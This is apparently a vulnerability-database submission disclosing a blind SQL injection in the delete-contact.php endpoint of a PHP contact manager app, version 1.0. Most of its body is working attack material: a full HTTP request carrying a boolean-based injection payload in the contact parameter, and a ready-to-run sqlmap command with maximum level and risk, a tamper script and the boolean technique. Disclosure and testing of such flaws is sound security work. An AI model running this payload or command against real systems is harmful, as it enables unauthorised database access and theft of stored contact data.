| Title | https://www.sourcecodester.com/php/17556/contact-manager-export- Web 1 SQL Injection |
|---|
| Description | Exploit Title:
SQL Injection Vulnerability in Contact Manager with Export to VCF
Date:
04/02/2025
Exploit Author:
Xcode0x
Twitter: @xcode0x
Vendor Homepage:
[https://github.com/]
Software Link:
[Not provided]
Version:
v1.0
Tested on:
Kali Linux
SQL Injection Details:
The web application is vulnerable to a blind SQL injection on the endpoint /contact-manager-with-export-to-vcf/endpoint/delete-contact.php. By injecting SQL payloads into the contact parameter, attackers can execute arbitrary SQL commands on the database, potentially extracting sensitive information or gaining unauthorized access to the system.
Endpoint:
GET /contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=
Example Vulnerable Request:
http
Copy
Edit
GET /contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=' RLIKE (SELECT (CASE WHEN (3542=3542) THEN '' ELSE 0x28 END)) AND 'QGIz'='QGIz HTTP/1.1
Host: 192.168.70.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Cache-Control: max-age=0
Proof of Concept (POC):
Send the payload contact=' RLIKE (SELECT (CASE WHEN (3542=3542) THEN '' ELSE 0x28 END)) AND 'QGIz'='QGIz in the contact parameter using SQLMap or manually with a tool like Burp Suite.
The server confirms the payload execution without errors, indicating a successful SQL injection vulnerability.
SQLMap Command:
bash
Copy
Edit
sqlmap -u "http://192.168.70.3/contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=" --random-agent --level 5 --risk 3 --threads=10 --tamper=space2comment --dbms=mysql --technique=B --where="RLIKE (SELECT CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)" --batch |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/17556/contact-manager-export-vcf-using-php-and-mysql-source-code.html |
|---|
| User | xcode0x (UID 39076) |
|---|
| Submission | 02/04/2025 11:18 (1 Year ago) |
|---|
| Moderation | 02/10/2025 10:06 (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 295072 [SourceCodester Contact Manager with Export to VCF 1.0 delete-contact.php sql injection] |
|---|
| Points | 20 |
|---|